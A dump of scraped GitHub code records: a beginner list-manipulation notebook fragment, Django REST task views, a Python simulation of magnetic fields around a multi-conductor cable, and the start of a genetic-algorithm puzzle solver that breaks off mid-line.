z.insert(3,\"yellow\")\n print(i)\n\n\n# In[33]:\n\n\ndel z[5]\n\n\n# In[48]:\n\n\nprint(z)\n\n\n# In[35]:\n\n\nz.insert(4,2)\n\n\n# In[51]:\n\n\nprint(z)\n\n\n# In[47]:\n\n\ndel z[\"yellow\"==2]\n\n\n# In[50]:\n\n\n\n\n\n# In[54]:\n\n\nfor i in z:\n if i==\"green\":\n z.pop()\n print(i)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"VirajChavan9011/Git","sub_path":"day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2049188935","text":"from grdnr_server.serialization import SerializationClassTask\nfrom grdnr_server.models import models\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom django.shortcuts import render\nimport requests\n\n\ndef get_all_tasks_view(request):\n get_task_api = requests.get('http://127.0.0.1:8000/api_get_all_tasks')\n results = get_task_api.json()\n return render(request, '../templates/tasks.html', {'data':results})\n\n\n# __________ Tasks APIs __________\n# Create tasks\n@api_view(['POST'])\ndef create_task(request):\n serializer = SerializationClassTask(data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n# update task\n@api_view(['POST'])\ndef update_task(request,pk):\n task_data = models.TaskModel.objects.get(task_id=pk)\n serializer = SerializationClassTask(instance=task_data, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n# get tasks\n@api_view(['GET'])\ndef get_one_tasks(request,pk):\n results = models.TaskModel.objects.get(task_id=pk)\n serializer = SerializationClassTask(results, many=False)\n return Response(serializer.data)\n\n\n# view all tasks\n@api_view(['GET'])\ndef api_get_all_tasks(request):\n results = models.TaskModel.objects.all()\n serialize = SerializationClassTask(results, many=True)\n return Response(serialize.data)","repo_name":"Altaf12sees/django_admin_server_app","sub_path":"grdnr_server/views/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73166892560","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport datetime\nimport time\nimport scipy.signal\nimport matplotlib\nfrom IPython import display\nimport time\nimport os\n\nclass Simulation(object):\n\n def __init__(self, fs=3600.0, f0=50, z=5, res=2e-4, d=11e-3):\n \"\"\"\n Initialize the main simulation parameters\n\n :param fs: Sampling frequency [Samples/Sec] (default=3600)\n :param f0: Base frequency [Hz] (default=50)\n :param z: Numper of periods to simulate [-] (default=5)\n :param res: Resolution of the mesh-grid [m] (default=2e-4)\n :param d: Outer diameter of the whole conductor [m] (default=11e-3)\n \"\"\"\n assert (d <= 0.1), 'Error: Diameteter must be smaller than 10cm'\n self.created = datetime.datetime.now().isoformat()\n self.fs = fs\n self.f0 = f0\n self.z = z\n self.T = 1 / self.f0 # Period [s]\n self.N = self.fs * self.T * self.z # Number of samples per period [-]\n self.w0 = 2 * np.pi * self.f0 # Angular frequency [rad/s]\n self.t = np.arange(0, self.z * self.T, (1 / self.fs)) # Time vector [s]\n self.res = res\n self.d = d\n\n # define min and max of the grid\n self.x_min = -self.d\n self.x_max = self.d\n self.y_min = -self.d\n self.y_max = self.d\n\n self.__init_mesh()\n self.conductors = {}\n self.sensors = {}\n\n self.B_meshgrids = []\n\n def __init_mesh(self):\n \"\"\"\n Initialize the mesh-grid\n\n :return:\n \"\"\"\n x = np.arange(self.x_min, self.x_max, self.res)\n y = np.arange(self.y_min, self.y_max, self.res)\n x, y = np.meshgrid(x, y)\n self.mesh_x = x\n self.mesh_y = y\n\n def __add_conductor(self, name, pos_x, pos_y, diam):\n \"\"\"\n Add a conductor / wire tho the simulation\n\n :param name: Unique name, usually L1 to L3 or N, PE\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n if (pos_x < self.x_min) or (pos_x > self.x_max):\n raise ValueError('Conductor outside the cable!')\n if (pos_y < self.y_min) or (pos_y > self.y_max):\n raise ValueError('Conductor outside the cable!')\n\n self.conductors[name] = self.Conductor(name, pos_x, pos_y, diam)\n\n def add_L1(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add L1 to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('L1', pos_x, pos_y, diam)\n\n # add default parameters\n self._set_current('L1', A1=1, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=0)\n self._set_voltage('L1', A1=230, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=0)\n\n def add_L2(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add L2 to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('L2', pos_x, pos_y, diam)\n\n # add default parameters\n self._set_current('L2', A1=1, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=-120)\n self._set_voltage('L2', A1=230, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=-120)\n\n def add_L3(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add L3 to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('L3', pos_x, pos_y, diam)\n\n # add default parameters\n self._set_current('L3', A1=1, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=120)\n self._set_voltage('L3', A1=230, A3=0, A5=0, A7=0, Phi1=0, Phi3=0, Phi5=0, Phi7=0, Shift=120)\n\n def add_N(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add N (neutral) to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('N', pos_x, pos_y, diam)\n\n def add_PE(self, pos_x, pos_y, diam):\n \"\"\"\n User function to add PE (earth) to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('PE', pos_x, pos_y, diam)\n\n def add_sensor(self, name, pos_x, pos_y):\n \"\"\"\n User function to add one sensor to the simulation\n\n :param name: Unique name\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :return:\n \"\"\"\n self.sensors[name] = self.Sensor(name, pos_x, pos_y)\n\n def add_sensors(self, n, r=None, phi0=0):\n \"\"\"\n User function to add multiple sensors to the simulation.\n The sensors will be distributed equal around the conductor\n at a distance of r and an initial offset angle of phi0\n referenced to the positive x-axis\n\n :param n: Number of sensors to place\n :param r: Optional. Distance (in m) from the center at which the sensors will be placed.\n If not provided, sensors will be placed with an offset of 1mm on the cable\n :param phi0: Optional. Initial angle-offset in degrees. Defaults to 0°\n :return:\n \"\"\"\n self.sensors = {}\n # assert n > 1, 'Error: number of sensors must be greater than 1'\n\n if r is None:\n r = self.d/2 + 1e-3\n else:\n assert r > self.x_max, \"Error, sensor outside the simulation space\"\n\n angles = np.arange(0, 2 * np.pi, 2 * np.pi / n)\n angles = angles + np.deg2rad(phi0)\n for i, phi in enumerate(angles):\n z = (r) * np.exp(1j * (phi))\n self.add_sensor('m' + str(i + 1), np.real(z), np.imag(z))\n\n def set_L1_I(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the current in L1\n\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_current('L1', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L2_I(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the current in L2\n\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_current('L2', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L3_I(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the current in L3\n\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_current('L3', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L1_V(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the voltage in L1\n\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_voltage('L1', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L2_V(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the voltage in L2\n\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_voltage('L2', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L3_V(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the voltage in L3\n\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_voltage('L3', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def _set_current(self, name, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n Function to set the current of an existing conductor\n\n :param name: Unique name of an existing conductor\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n if name in self.conductors.keys():\n sig = self.Signal(A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift, self.fs, self.f0, self.w0, self.t)\n self.conductors[name].set_current_sig(sig)\n else:\n raise ValueError('No conductor with this name!')\n\n def _set_voltage(self, name, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n Function to set the voltage of an existing conductor (referenced to N)\n\n :param name: Uniqua name of an existing conductor\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n if name in self.conductors.keys():\n sig = self.Signal(A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift, self.fs, self.f0, self.w0, self.t)\n self.conductors[name].set_voltage_sig(sig)\n else:\n raise ValueError('No conductor with this name!')\n\n def plot_Waveforms(self):\n \"\"\"\n Function provides a plot of currents and voltages of the available conductors\n\n :return:\n \"\"\"\n self.__calc_N()\n fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12, 6))\n\n for name, con in self.conductors.items():\n if not (con.V is None):\n ax[0].plot(self.t, con.V, label=name)\n ax[0].set_title('Line Voltages')\n ax[0].set_xlabel('Time [s]')\n ax[0].set_ylabel('Voltage [V]')\n\n for name, con in self.conductors.items():\n if not (con.I is None):\n ax[1].plot(self.t, con.I, label=name)\n ax[1].set_title('Line Currents')\n ax[1].set_xlabel('Time [s]')\n ax[1].set_ylabel('Current [A]')\n for axes in ax:\n axes.legend()\n axes.grid()\n fig.tight_layout()\n\n def __calc_N(self):\n \"\"\"\n Function to calculate the resulting neutral current from available conductors except PE\n\n :return:\n \"\"\"\n signals = []\n if 'N' in self.conductors.keys():\n # check if any other conductor is defined and has a signal\n for name, con in self.conductors.items():\n if (name == 'N') or (name == 'PE'):\n continue\n signals.append(con.I)\n if len(signals) > 0:\n self.conductors['N'].I = -np.sum(signals, axis=0)\n else:\n raise Warning('Neutral is not defined!')\n\n def plot_Layout(self):\n \"\"\"\n Function to plot the layout of the simulation including conductor position and diameter and optionally placed\n sensors\n\n :return:\n \"\"\"\n fig, ax = plt.subplots(figsize=(7, 5))\n ax.set_xlim([self.x_min, self.x_max])\n ax.set_ylim([self.y_min, self.y_max])\n ax.set_xlabel('X-Axis [m]')\n ax.set_ylabel('Y-Axis [m]')\n ax.add_artist(plt.Circle((0, 0), (self.d / 2), color='k', fill=False))\n if len(self.conductors) > 0:\n for name, con in self.conductors.items():\n ax.add_artist(plt.Circle((con.x, con.y), con.d / 2, color='k', fill=False))\n ax.text(con.x + 1e-3, con.y, con.name, fontsize=10)\n\n if len(self.sensors) > 0:\n for sensor in self.sensors.values():\n p_x = sensor.x\n p_y = sensor.y\n tmp_circle = plt.Circle((p_x, p_y), 0.2e-3, color='r', fill=True)\n ax.add_artist(tmp_circle)\n ax.text(p_x, p_y, sensor.name, fontsize=12)\n ax.set_aspect('equal')\n ax.grid(True)\n\n return fig, ax\n\n def plot_Fields(self, idx, scale='global'):\n \"\"\"\n Function to plot individual magnetic field maps\n\n :param idx: Time-Index for which the corresponding magnetic field map should be plotted\n :param scale: Applied scaling factor of the meshgrid. \"global\" fixes the scale to the global maximum and minimum\n of the entire time series. \"local\" scales each plot individually. Default: 'global'\n :return:\n \"\"\"\n fig, ax = self.plot_Layout()\n\n if len(self.B_meshgrids) > 0:\n mesh = self.B_meshgrids[idx]\n if scale == 'global':\n vmin = np.min(self.B_meshgrids)\n vmax = np.max(self.B_meshgrids)\n if scale == 'local':\n vmin = np.min(mesh)\n vmax = np.ax(mesh)\n im = ax.imshow(mesh,\n aspect='equal',\n cmap='jet',\n norm=matplotlib.colors.LogNorm(),\n origin='lower',\n extent=(self.x_min, self.x_max, self.y_min, self.y_max),\n vmin=vmin,\n vmax=vmax)\n cb = plt.colorbar(im)\n cb.set_label('Magnetic Flux Density [uT]')\n\n # for sensor in self.sensors.values():\n # p_x = sensor.x\n # p_y = sensor.y\n # tmp_circle = plt.Circle((p_x, p_y), 0.5e-3, color='r', fill=True)\n # ax.add_artist(tmp_circle)\n # ax.text(p_x, p_y, sensor.name, fontsize=12)\n # ax.grid(True)\n # ax.set_aspect('equal')\n\n def get_Meshgrids(self):\n \"\"\"\n Returns an array of all calculated meshgrids\n\n :return: Array of size N\n \"\"\"\n return self.B_meshgrids\n\n def get_Measurements(self):\n \"\"\"\n Returns a pandas DataFrame of the measured magnetic flux density measured for each sensor.\n Columns represent sensors, rows individual samples.\n\n :return: pandas DataFrame\n \"\"\"\n tmp = {}\n for name, sensor in self.sensors.items():\n tmp[name] = sensor.B_fields\n\n return pd.DataFrame(tmp)\n \n def get_Measurements_Exact(self):\n \n B = {}\n sens = []\n for key in self.sensors.keys():\n B[key] = []\n sens.append(self.sensors[key].x)\n sens.append(self.sensors[key].y)\n sens = np.array(sens).reshape(-1, 2)\n\n for idx in range(len(self.t)):\n x = []\n for key in self.conductors.keys():\n if key == 'PE':\n continue\n x.append([self.conductors[key].x, self.conductors[key].y, self.conductors[key].I[idx]])\n x = np.array(x).reshape(len(self.conductors)-1, -1)\n\n tmp = self._get_B_exact(x, sens)\n for i, key, in enumerate(self.sensors.keys()):\n B[key].append(tmp[i])\n\n return pd.DataFrame(B)\n\n\n \n\n \n\n def get_Waveforms(self):\n \"\"\"\n Returns a pandas DataFrame of all currents and voltages\n\n :return: pandas DataFrame\n \"\"\"\n self.__calc_N()\n tmp = {}\n tmp['Time'] = self.t\n\n for name, con in self.conductors.items():\n if not (con.V is None):\n tmp[name + 'V'] = con.V\n\n for name, con in self.conductors.items():\n if not (con.I is None):\n tmp[name + 'I'] = con.I\n\n return pd.DataFrame(tmp)\n\n def get_Features(self):\n \"\"\"\n Returns a dictionary consisting of all relevant features of the IEEE1459 standard for each current carrying\n conductor\n :return: dict with conductor names as key and features as values\n \"\"\"\n self.__calc_N()\n features = {}\n for name, con in self.conductors.items():\n if (name == 'N') or (name == 'PE'):\n continue\n features[name] = con.get_Power()\n return features\n\n def _get_B_exact(self, x, sens):\n \"\"\"\n param x: location and current of conductors, [[x1, y1, I1], [x2, y2, I2], ...]\n param sens: location of sensors [[x1, y1], [x2, y2]]\n \"\"\"\n Theta = 0\n u0 = 4 * np.pi * 1e-7\n N = sens.shape[0]\n M = x.shape[0]\n # result = np.ones((M, N))*np.nan\n result = []\n\n for n in range(N): # n=sensor number\n for m in range(M): # m = conductor number\n den = 2 * np.pi * np.sqrt((sens[n, 0]) ** 2 + (sens[n, 1]) ** 2) * (\n (sens[n, 0] - x[m, 0]) ** 2 + (sens[n, 1] - x[m, 1]) ** 2)\n nom = u0 * x[m, 2] * (\n ((sens[n, 0] * np.cos(Theta) - sens[n, 1] * np.sin(Theta)) * (sens[n, 0] - x[m, 0])) + \\\n +((sens[n, 1] * np.cos(Theta) + sens[n, 0] * np.sin(Theta)) * (sens[n, 1] - x[m, 1])))\n # result[m,n] = nom/den\n result.append(nom / den)\n result = np.array(result).reshape(N, M)\n result = np.array(result).sum(axis=1) * 1e6\n return result\n\n def _get_B(self, x, y, xi, yi, d, i):\n \"\"\"\n Calculates the magnetic field strength at a certain location (x-, y-coordiantes)\n\n Parameters:\n x, y: meshgrid [Meter]\n xi, yi: location of the conductor [Meter]\n d: dimension of conductor in [Meter]\n i: current through the conductor [Ampere]\n\n return:\n bx, by: meshgrid\n \"\"\"\n\n mu = 4*np.pi*1e-7 # magnetic constant\n r = np.sqrt((x - xi) ** 2 + (y - yi) ** 2) # distance to conductor\n # r = r + 1e-4\n mask = (r) < d / 2 # use only coordinates outside of conductor\n r[mask] = d / 2 # set distance inside conductor to big values\n mag = (mu / (2 * np.pi)) * (abs(i) / r) # Magnitude of the vector B\n\n # calculate x- and y-component of magnitude\n r = np.sqrt((x - xi) ** 2 + (y - yi) ** 2) # distance to conductor\n x = (x - xi) / r\n y = (y - yi) / r\n if (i > 0):\n by = mag * x # By\n bx = mag * -y # Bx\n else:\n by = mag * -x # By\n bx = mag * y # Bx\n\n return bx, by, mag\n\n def run(self):\n \"\"\"\n Start the simulation and calculate currents and magnetic fields\n :return:\n \"\"\"\n self.StartTime = datetime.datetime.now().isoformat()\n self.__calc_N()\n # reset calculated meshgrids\n self.B_meshgrids = []\n # reset sensors\n for sensor in self.sensors.values():\n sensor.B_fields = []\n\n for idx in range(len(self.t)):\n bx = []\n by = []\n for name, con in self.conductors.items():\n if name == 'PE':\n continue\n _bx, _by, _mag = self._get_B(self.mesh_x,\n self.mesh_y,\n con.x,\n con.y,\n con.d,\n con.I[idx])\n bx.append(_bx)\n by.append(_by)\n\n # calculate superposition of all magnetic field vectors\n bx = np.sum(bx, axis=0)\n by = np.sum(by, axis=0)\n\n # calculate magnitude and convert into uT\n mag = np.sqrt(bx ** 2 + by ** 2) * 1e6\n self.B_meshgrids.append(mag)\n zero = len(mag) / 2\n\n for sensor in self.sensors.values():\n # get sensor coordinates\n x_s = sensor.x\n y_s = sensor.y\n\n # get index relative to meshgrid\n x_s_idx = int(zero + x_s / self.res)\n y_s_idx = int(zero + y_s / self.res)\n\n # get B-Vector in coresponding direction\n x_B = bx[y_s_idx, x_s_idx]\n y_B = by[y_s_idx, x_s_idx]\n\n # calculate magnitude according to sensors angle in uT\n B_hat = ((-y_s * x_B + x_s * y_B) / (np.sqrt(x_s ** 2 + y_s ** 2)) * 1e6)\n\n sensor.B_fields.append(B_hat)\n self.EndTime = datetime.datetime.now().isoformat()\n\n class Conductor(object):\n\n def __init__(self, name, pos_x, pos_y, diam):\n\n self.name = name\n self.x = pos_x\n self.y = pos_y\n self.d = diam\n self.sig_I = None\n self.sig_V = None\n self._I = None\n\n def set_current_sig(self, sig):\n \"\"\"\n Sets the current of this conductor\n :param sig: Signal object\n :return:\n \"\"\"\n self.sig_I = sig\n\n def get_current_sig(self):\n \"\"\"\n Returns current of this conductor\n :return: Signal object\n \"\"\"\n return self.sig_I\n\n def set_voltage_sig(self, sig):\n \"\"\"\n Sets the voltage of this conductor (referenced to N)\n\n :param sig: Signal object\n :return:\n \"\"\"\n self.sig_V = sig\n\n def get_voltage_sig(self):\n \"\"\"\n Gets the voltage of this conductor\n :return: Signal object\n \"\"\"\n return self.sig_V\n\n def update(self, w0, t):\n \"\"\"\n Function to update important simulation parameters\n\n :param w0: Angular frequency [rad/s]\n :param t: time vector [s]\n :return:\n \"\"\"\n if not (self.sig_I is None) and (self.sig_V is None):\n self.sig_I.update(w0, t)\n self.sig_V.update(w0, t)\n\n def get_Power(self, verbose=False):\n \"\"\"\n Returns a dict of relevant IEEE1459 features\n :param verbose: True to plot calculated features.\n :return: dict with feature names as keys and features as values\n \"\"\"\n i = self.I\n v = self.V\n fs = self.sig_I.fs\n f0 = self.sig_I.f0\n N = len(i)\n Shift_90 = int((fs / f0) / 4)\n assert len(i) == len(v)\n # RMS von Strom und Spannung\n Irms = np.sqrt(np.mean(np.square(i[0:int(N / 2)])))\n\n Urms = np.sqrt(np.mean(np.square(v[0:int(N / 2)])))\n\n # Wirk- und Blindleistung\n P = np.dot(v[0:int(N / 2)], i[0:int(N / 2)]) / (N / 2)\n Q = np.dot(v[0:int(N / 2)], i[Shift_90:int(N / 2) + Shift_90]) / (N / 2)\n\n # Scheinleistung CAVEAT: Gilt nur wenn Strom und Spannung Sinusförmig sind!!\n S = Urms * Irms\n D = np.sqrt(S ** 2 - P ** 2 - Q ** 2)\n PF = P / S\n\n if verbose:\n print(\"Urms = %0.4f [V]\" % Urms)\n print(\"Irms = %0.4f [A]\" % Irms)\n print(\"P = %0.4f [W]\" % P)\n print(\"Q = %0.4f [VA]\" % Q)\n print(\"S = %0.4f [Var]\" % S)\n print(\"PF = %0.4f [-]\" % PF)\n print(\"D = %0.4f [-]\" % D)\n\n return {'Urms': Urms, 'Irms': Irms, 'P': P, 'Q': Q, 'S': S, 'PF': PF, 'D': D}\n\n @property\n def I(self):\n \"\"\"\n Returns the an array of generated current samples\n :return: array\n \"\"\"\n if not (self.sig_I is None):\n return self.sig_I.calc()\n else:\n return self._I\n\n @I.setter\n def I(self, I):\n \"\"\"\n Sets local current samples\n :param I:\n :return:\n \"\"\"\n self._I = I\n\n @property\n def V(self):\n \"\"\"\n Returns an array of voltage samples\n :return:\n \"\"\"\n if not (self.sig_V is None):\n return self.sig_V.calc()\n\n class Signal(object):\n\n def __init__(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift, fs, f0, w0, t):\n self.A1 = A1\n self.A3 = A3\n self.A5 = A5\n self.A7 = A7\n self.Phi1 = Phi1\n self.Phi3 = Phi3\n self.Phi5 = Phi5\n self.Phi7 = Phi7\n self.Shift = Shift\n self.fs = fs\n self.f0 = f0\n self.w0 = w0\n self.t = t\n\n self.calc()\n\n def update(self, w0, t):\n \"\"\"\n Function to update important simulation parameters\n\n :param w0: Angular frequency [rad/s]\n :param t: time vector [s]\n :return:\n \"\"\"\n self.w0 = w0\n self.t = t\n self.calc()\n\n def calc(self):\n \"\"\"\n Calculates the signal time-series according to the provided parameters\n :return: numpy array\n \"\"\"\n # Angles of the fundamental component and harmonics\n phi1 = np.deg2rad(self.Phi1 + self.Shift)\n phi3 = np.deg2rad(self.Phi3 + self.Shift * 3)\n phi5 = np.deg2rad(self.Phi5 + self.Shift * 5)\n phi7 = np.deg2rad(self.Phi7 + self.Shift * 7)\n\n # instantaneous values\n H1 = np.sqrt(2) * self.A1 * np.sin(1 * self.w0 * self.t + phi1)\n H3 = np.sqrt(2) * self.A3 * np.sin(3 * self.w0 * self.t + phi3)\n H5 = np.sqrt(2) * self.A5 * np.sin(5 * self.w0 * self.t + phi5)\n H7 = np.sqrt(2) * self.A7 * np.sin(7 * self.w0 * self.t + phi7)\n\n return H1 + H3 + H5 + H7\n\n class Sensor(object):\n\n def __init__(self, name, pos_x, pos_y, angle=None):\n self.name = name\n self.x = pos_x\n self.y = pos_y\n self.angle = angle\n self.B_fields = []","repo_name":"tecamenz/MCMFS","sub_path":"mcmfs/cable_simulation.py","file_name":"cable_simulation.py","file_ext":"py","file_size_in_byte":30482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37460090526","text":"import numpy as np\nimport random\nfrom itertools import permutations\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom tabulate import tabulate\n\n# ------ parameters --------------------------------------------------------------------------#\n# globals\nnumbers = None\nindex = 0\nN = None\ngiven_constraints = None\npopulation_size = 200\nold_population_percent = 0.3\nnew_population_percent = 0.4\nrandom_population_percent = 0.3\nconstraint_weight = 5\nmutation_percent = 0.2\nmaximum_generation = None\nblack_list = set()\nmax_score_list_reg, av_score_list_reg = [], []\nmax_score_list_darwin, av_score_list_darwin = [], []\nmax_score_list_lamark, av_score_list_lamark = [], []\naccuracy_reg, accuracy_darwin, accuracy_lamark = 0, 0, 0\n\n# dynamic parameters\nconfig_list, initial_matrix, greater_constraints, max_fitness = None, None, None, None\npopulation, fitness_scores, generation = None, None, None\n# ----------------------------------------------------------------------------------------------#\n\n# returns the next index - grows each time +1\ndef next_index():\n global index\n index += 1\n return index\n\n# returns a list of all configuration according to the config.txt file given\ndef read_config_list(filename):\n config = open(filename, \"r\")\n config_list = []\n for line in config:\n stripped_line = line.strip()\n item = stripped_line\n if ' ' in stripped_line:\n item = stripped_line.split(' ')\n config_list.append(item)\n config.close()\n return config_list\n\n# creates a matrix according to the list of configuration made by config.txt\ndef build_matrix(config_list):\n global N\n N = int(config_list[index])\n matrix = np.zeros((N, N)) # empty\n given_digits = int(config_list[next_index()])\n for i in range(given_digits):\n curr = next_index()\n x, y, digit = 